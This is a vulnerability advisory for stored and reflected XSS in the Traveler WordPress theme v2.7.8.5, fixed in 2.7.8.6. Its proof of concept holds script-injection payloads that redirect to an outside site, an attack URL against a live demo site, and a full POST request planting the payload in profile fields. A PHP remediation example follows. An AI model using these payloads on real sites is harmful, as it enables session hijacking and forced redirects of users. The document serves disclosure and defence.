Travel Booking < 2.7.8.6 - Reflected & Persistent XSS Issues
Description
A Reflected & Persistent XSS vulnerability was discovered in the 'Travel Booking WordPress Theme' (tested version: v2.7.8.5).
Edit (WPScanTeam):
January 11th, 2020 - Report received & Envato contacted
January 12th, 2020 - Report updated with Reflected XSS; Envato notified again.
January 12th, 2020 - Envato investigating
January 13th, 2020 - 2.7.8.6 released, fixing the issues
Proof of Concept
# Exploit Title: Travel Booking WordPress Theme v2.7.8.5 Reflected & Persistent XSS
# Google Dork: /wp-content/themes/traveler/
# Date: 11/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://travelerwp.com/
# Software Link: https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
# Version: 2.7.8.5
# Tested on: Kali Linux
# CVE: -
# CWE: 79

----[]- Info: -[]----

Demo website: https://mixmap.travelerwp.com/
PoC Profile: https://mixmap.travelerwp.com/author/m0ze2/

----[]- Reflected XSS: -[]----

Payload Sample:
"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC:
https://mixmap.travelerwp.com/?s=%22%3E%3Cimg%20src=x%20onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;%3E

----[]- Persistent XSS -> User Profile: -[]----

Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website.
Vulnerable input fields: «Paypal Email», «Phone Number» and «Home Airport».
Vulnerable textarea: «About Yourself».

Payload Sample (for input):
"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

Payload Sample (for textarea):
</textarea><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>

PoC:

POST /page-user-setting/?sc=setting&id_user HTTP/1.1
Host: mixmap.travelerwp.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------191691572411478
Content-Length: 2210
Origin: https://mixmap.travelerwp.com
Connection: close
Referer: https://mixmap.travelerwp.com/page-user-setting/?sc=setting&id_user
Cookie: _your_cookies_here_
Upgrade-Insecure-Requests: 1

-----------------------------191691572411478
Content-Disposition: form-data; name="st_update_user"

ba1d73a992
-----------------------------191691572411478
Content-Disposition: form-data; name="_wp_http_referer"

/page-user-setting/?sc=setting&id_user
-----------------------------191691572411478
Content-Disposition: form-data; name="id_user"

1672
-----------------------------191691572411478
Content-Disposition: form-data; name="st_paypal_email"

"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_email"

asdasd@asdasd.com
-----------------------------191691572411478
Content-Disposition: form-data; name="st_phone"

"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_bio"

</textarea><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_is_check_show_info"

on
-----------------------------191691572411478
Content-Disposition: form-data; name="id_avatar"

10928
-----------------------------191691572411478
Content-Disposition: form-data; name="st_avatar"; filename=""
Content-Type: application/octet-stream


-----------------------------191691572411478
Content-Disposition: form-data; name="st_airport"

"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_province"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_address"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_zip_code"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_city"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_country"


-----------------------------191691572411478
Content-Disposition: form-data; name="st_btn_update"

Save Changes
-----------------------------191691572411478--
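The two stored payloads above work because the saved profile value is echoed back unescaped: `">` closes the input's value attribute and `</textarea>` closes the bio textarea. The following is an added example, not the Traveler theme's code, showing how a WordPress handler would sanitise those fields on save and escape them on output. The function names and the nonce action string are hypothetical; the field names (st_paypal_email, st_phone, st_airport, st_bio, st_update_user) are taken from the request in the advisory, and the WordPress API calls are real.

```php
<?php
// Hypothetical handler for the profile-settings POST shown in the advisory.
function example_handle_profile_update() {
    // 'st_update_user' is the nonce field seen in the request; the action
    // string passed to wp_verify_nonce() is assumed here.
    if ( ! isset( $_POST['st_update_user'] )
        || ! wp_verify_nonce( $_POST['st_update_user'], 'st_update_user' ) ) {
        return;
    }
    // Tie the update to the logged-in user rather than trusting a posted id.
    $user_id = get_current_user_id();
    if ( ! $user_id || ! current_user_can( 'edit_user', $user_id ) ) {
        return;
    }
    // Single-line fields: sanitize_text_field() strips tags, invalid UTF-8
    // and line breaks before the value is stored.
    foreach ( array( 'st_paypal_email', 'st_phone', 'st_airport' ) as $field ) {
        if ( isset( $_POST[ $field ] ) ) {
            $clean = sanitize_text_field( wp_unslash( $_POST[ $field ] ) );
            update_user_meta( $user_id, $field, $clean );
        }
    }
    // Multi-line bio: keep newlines, still strip tags.
    if ( isset( $_POST['st_bio'] ) ) {
        $bio = sanitize_textarea_field( wp_unslash( $_POST['st_bio'] ) );
        update_user_meta( $user_id, 'st_bio', $bio );
    }
}

// Hypothetical renderer for the same fields. Escaping at output is what
// actually neutralises the payloads: esc_attr() encodes " and < so '">'
// cannot close the value attribute, and esc_textarea() encodes < so the
// literal text '</textarea>' can no longer close the element.
function example_render_profile_fields( $user_id ) {
    foreach ( array( 'st_paypal_email', 'st_phone', 'st_airport' ) as $field ) {
        $value = get_user_meta( $user_id, $field, true );
        printf(
            '<input type="text" name="%1$s" value="%2$s">' . "\n",
            esc_attr( $field ),
            esc_attr( $value )
        );
    }
    $bio = get_user_meta( $user_id, 'st_bio', true );
    printf( '<textarea name="st_bio">%s</textarea>' . "\n", esc_textarea( $bio ) );
}
```

Sanitising on input alone is not sufficient, since values stored before the fix or written through other code paths are still rendered; the output escaping is the control that closes the reported issue.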
Affects Themes
Fixed in 2.7.8.6
Classification
Type: XSS
CWE: 79

Miscellaneous
Original Researcher: m0ze
Submitter: m0ze
Verified: Yes

Timeline
Publicly Published: 2020-01-13
Added: 2020-01-14
Last Updated: 2021-01-19